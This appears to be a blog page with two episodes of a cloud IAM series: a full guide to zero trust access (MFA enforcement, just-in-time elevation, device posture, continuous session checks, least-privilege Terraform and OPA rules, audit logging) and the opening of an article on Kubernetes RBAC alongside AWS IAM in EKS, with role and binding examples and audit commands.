Zero Trust Access in the Cloud: How the Evaluation Loop Actually Works

Reading Time: 10 minutes

Meta Description: Understand how zero trust access in the cloud works end to end — continuous verification, least privilege enforcement, and the full policy evaluation loop.




TL;DR

  • Zero Trust: trust nothing implicitly, verify everything explicitly, minimize blast radius by assuming you will be breached
  • Network location is not identity — VPN is authentication for the tunnel, not authorization for the resource
  • JIT privilege elevation removes standing admin access: engineers request elevation for a specific purpose, scoped to a specific duration
  • Device posture is an access signal — a compromised endpoint with valid credentials is still a threat; Conditional Access gates on device compliance
  • Continuous session validation re-evaluates signals throughout the session: when a device falls out of compliance, sessions are revoked within minutes, not at expiry
  • The highest-ROI early moves: eliminate machine static credentials, enforce MFA on all human access, federate to a single IdP

The Big Picture

  ZERO TRUST IAM — EVERY REQUEST EVALUATED INDEPENDENTLY

  API call arrives
         │
         ▼
  Identity verified? ──── No ────► DENY
         │
        Yes
         │
         ▼
  Device compliant? ───── No ────► DENY (or step-up MFA)
         │
        Yes
         │
         ▼
  Policy allows this  ─── No ────► DENY
  action on this ARN?
         │
        Yes
         │
         ▼
  Conditions met? ─────── No ────► DENY
  (time, IP, MFA age,              (e.g., outside business hours,
   risk score, session)             impossible travel detected)
         │
        Yes
         │
         ▼
       ALLOW ──────────────────────► LOG every decision (allow and deny)
         │
         └── Continuous re-evaluation:
             device state changes → revoke
             anomaly detected → revoke or step-up
             credential age → require re-auth
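
The flow above can be sketched as an ordered chain of gates. This is a minimal illustration, not how any provider implements it: the `Request` fields are hypothetical booleans standing in for real identity, device, policy, and context checks.

```python
from dataclasses import dataclass


@dataclass
class Request:
    # Each field is a stand-in for a real check (all names are hypothetical).
    identity_verified: bool
    device_compliant: bool
    policy_allows: bool      # action + resource matched against policy
    conditions_met: bool     # time, IP, MFA age, risk score, session


@dataclass
class Decision:
    allowed: bool
    reason: str


def evaluate(req: Request, audit_log: list) -> Decision:
    """Run the gates in order; the first failing gate denies the request."""
    gates = [
        ("identity", req.identity_verified),
        ("device", req.device_compliant),
        ("policy", req.policy_allows),
        ("conditions", req.conditions_met),
    ]
    decision = Decision(True, "all gates passed")
    for name, passed in gates:
        if not passed:
            decision = Decision(False, f"failed gate: {name}")
            break
    audit_log.append(decision)  # log every decision, allow and deny
    return decision
```

Every call goes through `evaluate` again, so nothing is carried over from a previous request, and the audit log receives denies as well as allows.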

Introduction

The perimeter model of network security made a bet: inside the network is trusted, outside is not. Lock down the perimeter tightly enough and you’re safe. VPN in, and you’re one of us.

I grew up professionally in that model. Firewalls, DMZs, trusted zones. The idea had intuitive appeal — you build walls, you control what crosses them. For a while it worked reasonably well.

Then I watched it fail, repeatedly, in ways that were predictable in hindsight. An engineer’s laptop gets compromised at a coffee shop. They VPN in. Now the attacker is “inside.” A contractor account gets phished. They have valid Active Directory credentials. They’re inside. A cloud service gets misconfigured and exposes a management interface. There’s no perimeter for that to be inside of.

The perimeter model failed not because the walls weren’t strong enough, but because the premise was wrong. There is no inside. There is no perimeter that reliably separates trusted from untrusted. In a world of remote work, cloud services, contractor access, and API integrations, the attack surface doesn’t respect network boundaries.

Zero Trust is the architecture built on a different premise: trust nothing implicitly. Verify everything explicitly. Minimize blast radius by assuming you will be breached.

This isn’t a product you buy. It’s a set of principles applied to how you design, build, and operate your IAM. This episode shows how those principles translate into concrete practices, building on everything we’ve covered in this series.


The Three Principles

Verify Explicitly

Every request must carry verifiable identity and context. Network location is not identity.

Old model: request from 10.0.0.0/8 → trusted, proceed
Zero Trust: request from 10.0.0.0/8 → still must present verifiable identity
                                       still must pass authorization check
                                       still must pass context evaluation
                                       then proceed (or deny)

In cloud IAM terms: every API call carries identity claims (IAM role ARN, federated identity, managed identity), and those claims are verified against policy on every single request. There’s no concept of “once authenticated, trusted until logout.” Cloud provider APIs already work this way natively: every call is authenticated and authorized independently. The challenge is extending this model to internal services, internal APIs, and human access patterns.

Implementation in practice:
– mTLS for service-to-service communication — both sides present certificates; identity is the certificate, not the network path
– Bearer tokens on every internal API call — no session cookies, no “we’re on the same VPC so it’s fine”
– Short-lived credentials everywhere, so a compromised credential expires within minutes, not “after the session times out in 8 hours”
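
To make the short-lived credential idea concrete, here is a minimal sketch of a signed bearer token that carries its own expiry. It uses only the Python standard library; the `SECRET` key, the token layout, and the function names are assumptions for illustration, not a real token format such as JWT.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"demo-signing-key"  # hypothetical; a real issuer would use a managed key


def issue_token(subject: str, ttl_seconds: int, now: float) -> str:
    """Return 'payload.signature' where the payload carries an expiry time."""
    payload = json.dumps({"sub": subject, "exp": now + ttl_seconds}).encode()
    body = base64.urlsafe_b64encode(payload)
    sig = hmac.new(SECRET, body, hashlib.sha256).hexdigest()
    return f"{body.decode()}.{sig}"


def verify_token(token: str, now: float):
    """Return the subject if the signature is valid and the token is unexpired."""
    try:
        body, sig = token.rsplit(".", 1)
    except ValueError:
        return None  # no separator, so not a token we issued
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig.encode(), expected.encode()):
        return None  # tampered or signed with a different key
    claims = json.loads(base64.urlsafe_b64decode(body.encode()))
    if now >= claims["exp"]:
        return None  # expired: the credential simply stops working
    return claims["sub"]
```

In real use `now` would come from `time.time()`. The point of the sketch is that the verifier checks the token on every call, and a stolen token loses its value when the expiry passes without anyone having to revoke it.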

Use Least Privilege — Just-in-Time, Just-Enough

No standing access to sensitive resources. Access granted when needed, for the minimum scope, for the minimum duration.

Old model: alice is in the DBA group → permanent access to all databases
Zero Trust: alice requests access to production DB →
            verified: alice's device is enrolled in MDM and compliant
            verified: alice has an open change ticket for this task
            verified: current time is within business hours
            granted: connection to this specific database, from alice's specific IP
                     for 2 hours, then revoked automatically

This is JIT access. It reduces the window where a compromised credential can cause damage. It requires a change in how engineers think about access: access is not a property you have, it’s something you request when you need it. The operational friction is a feature, not a bug. Justifying each elevated access request is what keeps the access model honest.
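
The request-and-expire pattern can be sketched in a few lines. This is an illustration under stated assumptions: the `Grant` type, the precondition flags, and the ticket ID are hypothetical, and a real system would delegate these checks to the IdP, MDM, and ITSM tools.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class Grant:
    principal: str
    resource: str
    justification: str
    expires_at: datetime


def request_access(principal, resource, justification, duration, now, *,
                   device_compliant, has_open_ticket):
    """Issue a time-boxed grant only when every precondition holds."""
    if not justification.strip():
        raise ValueError("a justification is required")
    if not (device_compliant and has_open_ticket):
        return None
    return Grant(principal, resource, justification, now + duration)


def is_active(grant, resource, now):
    """A grant covers one resource and stops working once it expires."""
    return (grant is not None
            and grant.resource == resource
            and now < grant.expires_at)


if __name__ == "__main__":
    start = datetime(2026, 4, 11, 9, 0, tzinfo=timezone.utc)
    grant = request_access("alice", "prod-db", "CHG-1234", timedelta(hours=2),
                           start, device_compliant=True, has_open_ticket=True)
    print(is_active(grant, "prod-db", start + timedelta(hours=1)))
    print(is_active(grant, "prod-db", start + timedelta(hours=3)))
```

Because expiry is evaluated at check time, nothing has to run to remove the access. The justification travels with the grant, which is what makes the later audit trail useful.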

Assume Breach

Design systems as if the attacker is already inside. This drives different decisions:

  • Micro-segmentation: one role per service, minimum permissions per role. If one service is compromised, it can’t pivot to everything else.
  • Log everything: every authorization decision, allow or deny. When you’re investigating an incident, you need to know what happened, not just that something happened.
  • Automate response: anomalous API call pattern → trigger automated credential revocation or session termination. Don’t wait for a human to notice.

Building Zero Trust IAM — Block by Block

Block 1: Strong Identity Foundation

You can’t verify explicitly without strong authentication. The starting point:

# AWS: deny every API call made without MFA; enforce via SCP across the org
# Caution: as written this also denies workload and federated role sessions that
# carry no MFA context; scope it to human principals or extend the exemptions first.
{
  "Effect": "Deny",
  "Action": "*",
  "Resource": "*",
  "Condition": {
    "BoolIfExists": {
      "aws:MultiFactorAuthPresent": "false"
    },
    "StringNotLike": {
      "aws:PrincipalArn": [
        "arn:aws:iam::*:role/aws-service-role/*",
        "arn:aws:iam::*:role/OrganizationAccountAccessRole"
      ]
    }
  }
}

# GCP: enforce OS Login for VM SSH (ties SSH access to Google identity, not SSH keys)
gcloud compute project-info add-metadata \
  --metadata enable-oslogin=TRUE

# This means: SSH to a VM requires your Google identity to have roles/compute.osLogin
# or roles/compute.osAdminLogin. No more managing ~/.authorized_keys files on instances.

For human access: hardware FIDO2 keys (YubiKey, Google Titan) rather than TOTP where possible. TOTP codes can be phished in real-time adversary-in-the-middle attacks. Hardware keys cannot — the cryptographic challenge-response is bound to the origin URL.

Block 2: Device Posture as an Access Signal

In a Zero Trust model, the identity of the user is necessary but not sufficient. The state of the device matters too — a compromised endpoint with valid credentials is still a threat.

# Azure Conditional Access: block access from non-compliant devices
# (configured in the Entra ID Conditional Access portal)
conditions:
  clientAppTypes: [browser, mobileAppsAndDesktopClients]
  devices:
    deviceFilter:
      mode: exclude
      rule: "device.isCompliant -eq True and device.trustType -eq 'AzureAD'"
grantControls:
  builtInControls: [compliantDevice]
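
# AWS Verified Access: identity + device posture for application access, no VPN
aws ec2 create-verified-access-instance \
  --description "Zero Trust app access"

# Create the identity trust provider (Okta OIDC)
# --policy-reference-name is required; "okta" is a placeholder name.
# The authorization, token, and userinfo endpoints also belong in --oidc-options.
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type user \
  --user-trust-provider-type oidc \
  --policy-reference-name okta \
  --oidc-options Issuer=https://company.okta.com,ClientId=...,ClientSecret=...,Scope=openid

# Create the device trust provider (Jamf, CrowdStrike, or JumpCloud)
aws ec2 create-verified-access-trust-provider \
  --trust-provider-type device \
  --device-trust-provider-type jamf \
  --policy-reference-name jamf \
  --device-options TenantId=JAMF_TENANT_ID

# Then attach each provider to the instance with
# aws ec2 attach-verified-access-trust-provider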

AWS Verified Access allows users to reach internal applications by verifying both their identity (via OIDC) and their device health (via MDM) — without a VPN. The access gateway evaluates both signals on every connection, not just at login.

Block 3: Just-in-Time Privilege Elevation

No standing elevated access. Engineers are eligible for elevated roles; they activate them when needed.

# Azure PIM: engineer activates an eligible privileged role
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "USER_OBJECT_ID",
    "roleDefinitionId": "ROLE_DEF_ID",
    "directoryScopeId": "/",
    "justification": "Investigating security alert in tenant — incident ticket INC-2026-0411",
    "scheduleInfo": {
      "startDateTime": "2026-04-11T09:00:00Z",
      "expiration": {"type": "AfterDuration", "duration": "PT4H"}
    }
  }'
# Access activates, lasts 4 hours, then is removed automatically

# AWS: temporary account assignment via Identity Center
# (typically triggered by ITSM workflow integration, not manual CLI)
aws sso-admin create-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

# Schedule deletion (using EventBridge + Lambda in a real deployment)
aws sso-admin delete-account-assignment \
  --instance-arn "arn:aws:sso:::instance/ssoins-xxx" \
  --target-id ACCOUNT_ID \
  --target-type AWS_ACCOUNT \
  --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-xxx/ps-yyy" \
  --principal-type USER \
  --principal-id USER_ID

The operational change this requires: engineers stop thinking of access as something they hold permanently and start thinking of it as something they request for a specific purpose.

This feels like friction until you’re investigating an incident and you have a precise record of who activated what elevated access and why.

Block 4: Continuous Session Validation

Traditional auth: verify once at login, trust the session until timeout.
Zero Trust auth: re-evaluate access signals continuously throughout the session.

Session starts: identity verified + device compliant + IP in expected range
                → access granted

15 minutes later: impossible travel detected (IP changes to different country)
                  → step-up authentication required, or session terminated

Later: device compliance state changes (EDR detects malware)
       → all active sessions for this device revoked immediately

This requires integration between your identity platform and your device management / EDR tooling. Entra ID Conditional Access with Continuous Access Evaluation (CAE) implements this natively. When certain events occur — device compliance change, IP anomaly, token revocation — access tokens are invalidated within minutes rather than waiting for natural expiry.
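
The timeline above amounts to an event handler that re-checks a live session whenever a new signal arrives. A minimal sketch, assuming hypothetical signal shapes (`device_noncompliant`, `location_change`) that a real deployment would receive from its EDR and identity platform:

```python
from dataclasses import dataclass
from enum import Enum


class Action(Enum):
    CONTINUE = "continue"
    STEP_UP = "step_up"
    REVOKE = "revoke"


@dataclass
class Session:
    user: str
    device_id: str
    country: str
    active: bool = True


def on_signal(session: Session, signal: dict) -> Action:
    """Re-evaluate one session against a new signal and return the action taken."""
    kind = signal.get("type")
    if kind == "device_noncompliant" and signal.get("device_id") == session.device_id:
        session.active = False  # revoke now instead of waiting for expiry
        return Action.REVOKE
    if kind == "location_change" and signal.get("country") != session.country:
        return Action.STEP_UP   # require fresh authentication before continuing
    return Action.CONTINUE
```

The design choice worth noting is that the session never decides its own validity. Signals from outside the session drive the outcome, which is why the integration with device management matters.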

# GCP: bind IAM access to an Access Context Manager access level
# The access level enforces device compliance: if the device falls out of compliance,
# the level is no longer satisfied and requests fail
# USER_EMAIL is a placeholder. Confirm that request.auth.access_levels is supported
# for the target service before relying on this condition.
gcloud projects add-iam-policy-binding my-project \
  --member="user:USER_EMAIL" \
  --role="roles/bigquery.admin" \
  --condition="expression='accessPolicies/POLICY_NUM/accessLevels/corporate_compliant_device' in request.auth.access_levels,title=Compliant device required"

Block 5: Micro-Segmented Permissions

Every service has its own identity. Every identity has only what it needs. Compromise of one service cannot propagate to others.

# Terraform: IAM as code — each service gets a dedicated, scoped role
resource "aws_iam_role" "order_processor" {
  name                 = "svc-order-processor"
  permissions_boundary = aws_iam_policy.service_boundary.arn

  assume_role_policy = jsonencode({
    Version = "2012-10-17"
    Statement = [{
      Effect    = "Allow"
      Principal = { Service = "lambda.amazonaws.com" }
      Action    = "sts:AssumeRole"
    }]
  })
}

resource "aws_iam_role_policy" "order_processor" {
  name   = "order-processor-policy"
  role   = aws_iam_role.order_processor.id
  policy = jsonencode({
    Version = "2012-10-17"
    Statement = [
      {
        Effect   = "Allow"
        Action   = ["sqs:ReceiveMessage", "sqs:DeleteMessage", "sqs:GetQueueAttributes"]
        Resource = aws_sqs_queue.orders.arn
      },
      {
        Effect   = "Allow"
        Action   = ["dynamodb:PutItem", "dynamodb:GetItem", "dynamodb:UpdateItem"]
        Resource = aws_dynamodb_table.orders.arn
      }
    ]
  })
}

# Open Policy Agent: enforce IAM standards at the policy level
# Run this in CI/CD to fail the build on wildcard actions or unscoped deletes
# Note: these rules match Action and Resource written as single strings
package iam.policy

import rego.v1

deny contains msg if {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Action == "*"
  msg := sprintf("Statement %d has wildcard Action, which is not allowed", [i])
}

deny contains msg if {
  input.Statement[i].Effect == "Allow"
  input.Statement[i].Resource == "*"
  contains(input.Statement[i].Action, ":Delete")
  msg := sprintf("Statement %d allows Delete on all resources; use a specific ARN", [i])
}
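
IAM policy documents may write Action and Resource as either a single string or a list, so a CI check needs to handle both shapes. As a rough sketch of the same two checks outside OPA, with hypothetical function names and no claim to cover every IAM edge case (NotAction, for example, is ignored):

```python
def as_list(value):
    """IAM allows a string or a list for Action and Resource; normalize to a list."""
    return [value] if isinstance(value, str) else list(value or [])


def lint_policy(policy: dict) -> list:
    """Return human-readable findings for risky Allow statements."""
    findings = []
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may appear unwrapped
        statements = [statements]
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        actions = as_list(stmt.get("Action"))
        resources = as_list(stmt.get("Resource"))
        if "*" in actions:
            findings.append(f"Statement {i} has wildcard Action")
        if "*" in resources and any(":Delete" in a for a in actions):
            findings.append(f"Statement {i} allows Delete on all resources")
    return findings
```

A CI job could fail the build whenever `lint_policy` returns a non-empty list for any policy document rendered from the Terraform plan.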

Block 6: Universal Audit Trail

Zero Trust without logging is just obscurity. Every authorization decision — allow and deny — must be logged, retained, and queryable.

# AWS: verify CloudTrail is comprehensive
aws cloudtrail get-trail-status --name management-trail
# Must have: IsLogging=true

aws cloudtrail describe-trails --trail-name-list management-trail
# Must have: IsMultiRegionTrail=true, IncludeGlobalServiceEvents=true

# Verify no management events are excluded
aws cloudtrail get-event-selectors --trail-name management-trail \
  | jq '.EventSelectors[]? | {ReadWrite: .ReadWriteType, Mgmt: .IncludeManagementEvents}'
# ReadWriteType should be "All"; IncludeManagementEvents should be true
# (trails that use advanced event selectors return AdvancedEventSelectors instead)

# GCP: ensure Data Access audit logs are enabled for IAM
gcloud projects get-iam-policy my-project --format=json | jq '.auditConfigs'
# Should see auditLogConfigs for cloudresourcemanager.googleapis.com and iam.googleapis.com
# with both DATA_READ and DATA_WRITE enabled

# Azure: route Entra ID logs to Log Analytics for long-term retention and querying
az monitor diagnostic-settings create \
  --name entra-audit-to-la \
  --resource "/tenants/TENANT_ID/providers/microsoft.aad/domains/company.com" \
  --logs '[{"category":"AuditLogs","enabled":true},{"category":"SignInLogs","enabled":true}]' \
  --workspace /subscriptions/SUB_ID/resourceGroups/rg-monitoring/providers/Microsoft.OperationalInsights/workspaces/security-logs
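
Checks like these are easy to automate once the CLI output is parsed. A small sketch, assuming `trail` is one entry from the `trailList` returned by `aws cloudtrail describe-trails` and `status` is the output of `aws cloudtrail get-trail-status`; the function name and the wording of the findings are hypothetical.

```python
def trail_gaps(trail: dict, status: dict) -> list:
    """List the settings that fall short of a comprehensive management trail."""
    gaps = []
    if not status.get("IsLogging"):
        gaps.append("logging is stopped")
    if not trail.get("IsMultiRegionTrail"):
        gaps.append("trail is single-region")
    if not trail.get("IncludeGlobalServiceEvents"):
        gaps.append("global service events are excluded")
    return gaps
```

An empty list means the trail passes these three checks. Missing keys count as gaps, so a partial or malformed response fails closed.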

Framework Alignment

Zero Trust IAM isn’t a framework itself — it’s a design philosophy. But it maps cleanly onto the controls that compliance frameworks are pushing organizations toward:

Framework | Reference | What It Covers Here
CISSP | Domain 5: IAM | Zero Trust reframes IAM as continuous, context-aware verification rather than perimeter-based trust
CISSP | Domain 1: Security & Risk Management | Assume breach as a risk management posture; blast radius minimization through least privilege
CISSP | Domain 7: Security Operations | Continuous monitoring, anomaly detection, and automated response are operational requirements of Zero Trust
ISO 27001:2022 | 5.15 Access control | Zero Trust access policy: verify explicitly, least privilege, assume breach
ISO 27001:2022 | 8.16 Monitoring activities | Continuous session validation and universal audit trail; all authorization decisions logged
ISO 27001:2022 | 8.20 Networks security | Micro-segmentation and mTLS replace implicit network trust with verified identity at every hop
ISO 27001:2022 | 5.23 Information security for cloud services | Zero Trust architecture applied to cloud IAM across AWS, GCP, and Azure
SOC 2 | CC6.1 | Zero Trust logical access controls: JIT, device posture, context-aware authorization
SOC 2 | CC6.7 | Continuous session validation and transmission controls across all system components
SOC 2 | CC7.1 | Threat detection through universal audit trails and anomaly-triggered automated response
SOC 2 | CC7.2 | Incident response: automated revocation and session termination on anomaly detection

Zero Trust Maturity — Where to Start

In practice, most organizations think about Zero Trust as a destination — a large, multi-year program. The reality is it’s a direction. Any movement in that direction reduces risk.

Level | Where You Are | What to Build Next
1: Initial | Some MFA; static credentials for machines; no centralized IdP | Eliminate machine static keys → workload identity
2: Managed | Centralized IdP; SSO for most systems; some MFA enforcement | Close SSO gaps; enforce MFA everywhere; federate to cloud
3: Defined | Least privilege being enforced; audit tooling in use; JIT for some privileged access | Expand JIT; policy-as-code in CI/CD; quarterly access reviews
4: Contextual | Device posture in access decisions; conditional access policies | Continuous session evaluation; automated anomaly response
5: Optimizing | Policy-as-code everywhere; automated right-sizing; anomaly-triggered revocation | Refine and maintain; Zero Trust is never “done”

The jump from Level 1 to Level 3 delivers the most security value per unit of effort. Start there. Don’t defer least privilege enforcement while you build a sophisticated device posture integration.


The Practical Sequence

If you’re building Zero Trust IAM from where most organizations are, this is the order that maximizes early security value:

  1. Inventory all identities — human and machine. You cannot secure what you can’t see. Build a complete picture before changing anything.

  2. Eliminate static credentials for machines — replace access keys and SA key files with workload identity. This is the highest-ROI change in most environments.

  3. Enforce MFA for all human access — especially cloud consoles, IdP admin, and VPN. Hardware keys for privileged accounts.

  4. Federate human identity — single IdP, SSO to cloud and major applications. Centralize the revocation path.

  5. Right-size IAM permissions — use last-accessed data and IAM Recommender to find and remove unused permissions. This is a continuous discipline, not a one-time clean-up.

  6. JIT for privileged access — Azure PIM, AWS Identity Center assignment automation, or equivalent for all elevated roles. No standing admin.

  7. IAM as code — all IAM changes via Terraform/Pulumi/CDK, reviewed in pull requests, validated by Access Analyzer or OPA in CI/CD, applied through automation.

  8. Continuous monitoring — alerts on IAM mutations, anomalous API call patterns, new cross-account trust relationships, new public resource exposures.

  9. Add context signals — Conditional Access policies incorporating device posture. Access Context Manager in GCP. AWS Verified Access for application access.

  10. Automated response — anomaly detected → automatic credential suspension or session termination. Close the window between detection and containment.


Series Complete

This series covered Cloud IAM from the question “what even is IAM?” to Zero Trust architecture:

Episode | Topic | The Core Lesson
EP01 | What is IAM? | Access management is deny-by-default; every grant is an explicit decision
EP02 | AuthN vs AuthZ | Two separate gates; passing one doesn’t open the other
EP03 | Roles, Policies, Permissions | Structure prevents drift; wildcards accumulate into exposure
EP04 | AWS IAM Deep Dive | Trust policies and permission policies are both required; the evaluation chain has six layers
EP05 | GCP IAM Deep Dive | Hierarchy inheritance is a feature that needs careful handling; service account keys are an antipattern
EP06 | Azure RBAC and Entra ID | Two separate authorization planes; managed identities are the right model for workloads
EP07 | Workload Identity | Static credentials for machines are solvable at the root; OIDC token exchange replaces them
EP08 | IAM Attack Paths | The attack chain runs through IAM; iam:PassRole and its equivalents are privilege escalation primitives
EP09 | Least Privilege Auditing | 5% utilization is the average; the 95% excess is attack surface, and it’s measurable
EP10 | Federation, OIDC, SAML | The IdP is the trust anchor; everything downstream is bounded by its security
EP11 | Kubernetes RBAC | Two separate IAM layers; both must be secured; cluster-admin is the first thing to audit
EP12 | Zero Trust IAM | Trust nothing implicitly; verify everything explicitly; minimize blast radius through least privilege at every layer

IAM is not a feature you configure. It’s a practice you maintain. The organizations that operate with genuinely low cloud IAM risk don’t have fewer identities — they have better visibility into what those identities can do, and why, and what happened when something went wrong.

That’s what this series has been building toward.


The full series is at linuxcent.com/cloud-iam-series. If you found it useful, the best thing you can do is subscribe — the next series covers eBPF: what’s actually running in kernel space when Cilium, Falco, and Tetragon are doing their work.


Kubernetes RBAC and AWS IAM: The Two-Layer Access Model for EKS

Reading Time: 9 minutes

Meta Description: Understand how Kubernetes RBAC and AWS IAM interact in EKS — map the two-layer access model and debug permission failures across both control planes.




TL;DR

  • Kubernetes RBAC and cloud IAM are separate authorization layers — strong cloud IAM with weak Kubernetes RBAC is still a vulnerable cluster
  • cluster-admin ClusterRoleBindings are the first thing to audit — a compromised pod with cluster-admin controls the entire cluster
  • Disable automountServiceAccountToken on pods that don’t call the Kubernetes API — most application pods don’t need it mounted
  • Use OIDC for human access instead of X.509 client certificates — client certs cannot be revoked without rotating the CA
  • Bind groups from IdP, not individual usernames — revocation propagates automatically when someone leaves
  • A ServiceAccount that can create pods or create rolebindings is a privilege escalation path: the same class of risk as iam:PassRole

The Big Picture

  TWO AUTHORIZATION LAYERS — NEITHER COMPENSATES FOR THE OTHER

  ┌─────────────────────────────────────────────────────────────────┐
  │  CLOUD IAM LAYER  (AWS IAM / GCP IAM / Azure RBAC)             │
  │  Controls: S3, DynamoDB, Lambda, RDS, cloud services           │
  │  Human: federated identity from IdP (SAML / OIDC)             │
  │  Machine: IRSA annotation → IAM role / GKE WI / AKS WI        │
  │  Audit: CloudTrail, GCP Audit Logs, Azure Monitor              │
  └─────────────────────────────────────────────────────────────────┘
           ↕ separate systems — no inheritance in either direction
  ┌─────────────────────────────────────────────────────────────────┐
  │  KUBERNETES RBAC LAYER  (within the cluster)                   │
  │  Controls: pods, secrets, deployments, configmaps, namespaces  │
  │  Human: OIDC groups → ClusterRoleBinding (or RoleBinding)      │
  │  Machine: ServiceAccount → Role / ClusterRole                  │
  │  Audit: kube-apiserver audit log                               │
  └─────────────────────────────────────────────────────────────────┘

  Attack path: exploit app pod → SA has cluster-admin → own the cluster
  Audit finding: cluster-admin on app SA, regardless of cloud IAM posture

Introduction

I spent a long time in Kubernetes environments thinking cloud IAM and Kubernetes RBAC were related closely enough that securing one partially covered the other. They aren’t. They’re separate authorization systems that happen to share infrastructure.

The moment this crystallized for me: I was auditing an EKS cluster for a fintech company. Their AWS IAM posture was actually quite good — least privilege roles, no wildcard policies, SCPs in place at the org level. I was about to give them a clean bill of health when I ran one command:

kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.roleRef.name=="cluster-admin") | {name:.metadata.name, subjects:.subjects}'

The output showed five ClusterRoleBindings to cluster-admin. Two of them bound it to service accounts in production namespaces. One of those service accounts was used by an application that processed customer transactions.

cluster-admin in Kubernetes is the equivalent of AdministratorAccess in AWS. An attacker who compromises a pod running as that service account doesn’t just have access to the application’s data. They have control of the entire cluster: reading every secret in every namespace, deploying arbitrary workloads, modifying RBAC bindings to create persistence.

None of this showed up in the AWS IAM audit. AWS IAM and Kubernetes RBAC are separate systems. Securing one tells you nothing about the other.


Kubernetes RBAC Architecture

Kubernetes RBAC works with four object types:

Object | Scope | What It Does
Role | Single namespace | Defines permissions within one namespace
ClusterRole | Cluster-wide | Permissions across all namespaces, or for non-namespaced resources
RoleBinding | Single namespace | Binds a Role (or ClusterRole) to subjects, scoped to one namespace
ClusterRoleBinding | Cluster-wide | Binds a ClusterRole to subjects with cluster-wide scope

Subjects (the identities that receive the binding) are:
– User: an external identity (Kubernetes has no native user objects; users come from the authenticator)
– Group: a group of external identities
– ServiceAccount: a Kubernetes-native machine identity, namespaced

The scoping matters. A ClusterRole defines what permissions exist. A RoleBinding applies that ClusterRole within a single namespace. A ClusterRoleBinding applies it everywhere. The same permissions, dramatically different blast radius.
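
The difference in blast radius is easy to see in a toy model. The sketch below treats bindings as plain dictionaries shaped like the Kubernetes manifests; the function name is hypothetical, and it ignores non-namespaced resources, which a ClusterRoleBinding also covers.

```python
def effective_namespaces(binding: dict, all_namespaces: list) -> list:
    """Return the namespaces where a binding's permissions apply."""
    kind = binding["kind"]
    if kind == "ClusterRoleBinding":
        return list(all_namespaces)  # applies everywhere
    if kind == "RoleBinding":
        # Scoped to the binding's own namespace, even if roleRef is a ClusterRole.
        return [binding["metadata"]["namespace"]]
    raise ValueError(f"not a binding: {kind}")


if __name__ == "__main__":
    namespaces = ["default", "production", "monitoring"]
    role_ref = {"kind": "ClusterRole", "name": "view"}
    scoped = {"kind": "RoleBinding", "roleRef": role_ref,
              "metadata": {"name": "view-prod", "namespace": "production"}}
    wide = {"kind": "ClusterRoleBinding", "roleRef": role_ref,
            "metadata": {"name": "view-all"}}
    print(effective_namespaces(scoped, namespaces))
    print(effective_namespaces(wide, namespaces))
```

Both bindings reference the same ClusterRole. Only the kind of binding decides how far the permissions reach.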


Roles and ClusterRoles

# Role: read pods and their logs — scoped to the default namespace only
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""]          # "" = core API group (pods, secrets, configmaps, etc.)
  resources: ["pods", "pods/log"]
  verbs: ["get", "list", "watch"]

# ClusterRole: manage Deployments across all namespaces
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: deployment-manager
rules:
- apiGroups: ["apps"]
  resources: ["deployments", "replicasets"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]

The verbs map to HTTP methods against the Kubernetes API: get reads a specific resource, list returns a collection, watch streams changes, create/update/patch/delete are mutations.

One that consistently surprises people: list on secrets returns the full Secret objects, data included. You might think “list” is just metadata, but anyone who can list secrets can read their values, and watch behaves the same way. If a service account needs to check whether a secret exists, grant get restricted to that secret’s name through resourceNames. Avoid list and watch on the secrets resource.
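
RBAC rules are purely additive: a request is allowed if any one rule matches its API group, resource, and verb. Here is a simplified sketch of that matching, including the resourceNames restriction. It is a model for reasoning, not the kube-apiserver's implementation, and it skips subresource wildcards and nonResourceURLs.

```python
def rule_allows(rule: dict, api_group: str, resource: str, verb: str,
                name: str = "") -> bool:
    """Return True if a single RBAC rule permits the request."""
    def matches(allowed, value):
        return "*" in allowed or value in allowed

    if not matches(rule.get("apiGroups", []), api_group):
        return False
    if not matches(rule.get("resources", []), resource):
        return False
    if not matches(rule.get("verbs", []), verb):
        return False
    resource_names = rule.get("resourceNames", [])
    if resource_names and name not in resource_names:
        return False  # rule is limited to specific object names
    return True


def allowed(rules: list, api_group: str, resource: str, verb: str,
            name: str = "") -> bool:
    """RBAC has no deny rules: any matching rule grants access."""
    return any(rule_allows(r, api_group, resource, verb, name) for r in rules)
```

With a rule limited by resourceNames, a get for the named secret passes while a request without a name, such as list, does not. That is why the named get is the safer grant.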

The Wildcard Risk

# This is effectively cluster-admin in the default namespace — avoid
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]

Any * in RBAC rules is an audit finding. In practice I find wildcards most often in:
– Operator and controller service accounts (understandable, but worth reviewing)
– “Temporary” RBAC that became permanent
– Developer tooling given cluster-admin “because it was easier”

Run this to find all ClusterRoles with wildcard verbs:

kubectl get clusterroles -o json | \
  jq -r '.items[] | select(any(.rules[]?.verbs[]?; . == "*")) | .metadata.name'

Bindings — Connecting Identities to Roles

# RoleBinding: alice can read pods in the default namespace
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: alice-pod-reader
  namespace: default
subjects:
- kind: User
  name: alice@example.com   # placeholder; must match the username your authenticator presents
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io

